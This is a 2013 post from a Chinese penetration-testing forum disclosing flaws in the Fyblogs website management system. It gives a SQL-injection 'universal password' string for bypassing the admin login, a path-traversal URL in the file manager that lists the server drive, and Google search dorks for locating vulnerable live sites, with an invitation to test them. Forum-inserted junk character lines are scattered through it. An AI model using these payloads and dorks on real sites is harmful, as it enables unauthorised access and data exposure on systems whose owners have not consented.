中国网络渗透测试联盟
标题:
Fyblogs网站管理系统漏洞
[打印本页]
作者:
admin
时间:
2013-3-7 13:07
标题:
Fyblogs网站管理系统漏洞
漏洞类型: 未授权访问/权限绕过
. ~; ]& q( y8 s1 h- s+ q& ?
" k6 g, |/ X1 a/ e2 j5 K
简要描述:
5 _/ `3 p+ [9 ~
) B/ p2 v. K( L2 r$ w
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
, Y }! X( |4 K3 v/ _9 L
" o6 P/ c8 C. U: h4 o7 p. v, h
详细说明:
# \9 U$ o! n/ _4 a
# c& R+ K4 T! V
后台万能密码 'or'='or'
2 c9 k. d0 A& {1 {" r% Y
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
; |9 q( q- d- B- C* q+ f8 s
admin/uploadfile.asp?currentFolder=/upfiles/../
; g; Z/ G1 a; z
# j# \# O) K& ~: x
漏洞证明:
/ J3 o. ~( b0 T# t4 ^
O T: S2 W% n: ^/ `' ?
谷歌:inurl:type.asp?id=1 新闻中心
) ~' `" ~* f. H- j
或者 :inurl:download_ok.asp?
1 v' Q' I# ^' x( [; }
' s9 T ?+ {% r
可以测试
5 `- y: g2 p8 M% W& e3 d
k4 v. d0 I% G
9 x1 H$ K2 a8 W3 ~# H% P
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2